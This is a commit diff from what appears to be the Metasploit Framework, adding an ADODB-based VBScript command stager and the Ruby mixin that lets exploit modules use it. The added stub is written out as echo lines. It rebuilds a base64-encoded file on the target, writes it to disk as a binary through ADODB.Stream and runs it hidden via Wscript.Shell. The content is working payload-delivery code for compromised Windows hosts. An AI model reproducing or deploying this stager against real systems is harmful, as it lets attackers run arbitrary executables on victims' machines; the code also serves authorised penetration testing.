add an adodb based cmdstager, fixes #1431

git-svn-id: file:///home/svn/framework3/trunk@11247 4d416f70-5f16-0410-b530-b9f4589650da

data/exploits/cmdstager/vbs_b64_adodb

@@ -0,0 +1,50 @@
+echo Dim var_origLoc >>decode_stub
+echo var_origLoc = SetLocale(1033) >>decode_stub
+echo Set fs = CreateObject("Scripting.FileSystemObject") >>decode_stub
+echo Set file = fs.GetFile("ENCODED") >>decode_stub
+echo If file.Size Then >>decode_stub
+echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
+echo data = fd.ReadAll >>decode_stub
+echo data = Replace(data, vbCrLf, "") >>decode_stub
+echo data = base64_decode(data) >>decode_stub
+echo fd.Close >>decode_stub
+echo Dim var_strmConv, var_writedir, var_writestream >>decode_stub
+echo var_writedir = "DECODED" >>decode_stub
+echo Set var_strmConv = CreateObject("ADODB.Stream") >>decode_stub
+echo var_strmConv.Type = 2 >>decode_stub
+echo var_strmConv.Charset = "x-ansi" >>decode_stub
+echo var_strmConv.Open >>decode_stub
+echo var_strmConv.WriteText data, 0 >>decode_stub
+echo var_strmConv.Position = 0 >>decode_stub
+echo var_strmConv.Type = 1 >>decode_stub
+echo var_strmConv.SaveToFile var_writedir, 2 >>decode_stub
+echo SetLocale(var_origLoc) >>decode_stub
+echo Set shell = CreateObject("Wscript.Shell") >>decode_stub
+echo shell.run "DECODED", 0, false >>decode_stub
+echo Else >>decode_stub
+echo Wscript.Echo "The file is empty." >>decode_stub
+echo End If >>decode_stub
+echo Function base64_decode(byVal strIn) >>decode_stub
+echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
+echo For n = 1 To Len(strIn) Step 4 >>decode_stub
+echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
+echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
+echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
+echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
+echo If Not w2 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
+echo If  Not w3 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
+echo If Not w4 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
+echo Next >>decode_stub
+echo base64_decode = strOut >>decode_stub
+echo End Function >>decode_stub
+echo Function mimedecode(byVal strIn) >>decode_stub
+echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>decode_stub
+echo If Len(strIn) = 0 Then >>decode_stub
+echo mimedecode = -1 : Exit Function >>decode_stub
+echo Else >>decode_stub
+echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
+echo End If >>decode_stub
+echo End Function >>decode_stub

lib/msf/core/exploit/cmdstager_vbs_adodb.rb

@@ -0,0 +1,39 @@
+##
+# $Id: $
+##
+
+require 'msf/core/exploit/cmdstager'
+
+module Msf
+
+###
+#
+# This mixin provides an interface for staging cmd to arbitrary payloads
+#
+###
+module Exploit::CmdStagerVBS::ADODB
+
+	include Msf::Exploit::CmdStager
+
+	def initialize(info = {})
+		super
+
+		register_advanced_options(
+			[
+				OptString.new( 'DECODERSTUB',  [ true, 'The VBS base64 file decoder stub to use.',
+					File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_adodb")]),
+			], self.class)
+	end
+
+	def create_stager(exe)
+		Rex::Exploitation::CmdStagerVBS.new(exe)
+	end
+
+	def execute_cmdstager(opts = {})
+		opts.merge!({ :decoder => datastore['DECODERSTUB'] })
+		super
+	end
+
+end
+
+end

lib/msf/core/exploit/mixins.rb

@@ -18,6 +18,7 @@ require 'msf/core/exploit/exe'
 # CmdStagers
 require 'msf/core/exploit/cmdstager'
 require 'msf/core/exploit/cmdstager_vbs'
+require 'msf/core/exploit/cmdstager_vbs_adodb'
 require 'msf/core/exploit/cmdstager_debug_write'
 require 'msf/core/exploit/cmdstager_debug_asm'
 require 'msf/core/exploit/cmdstager_tftp'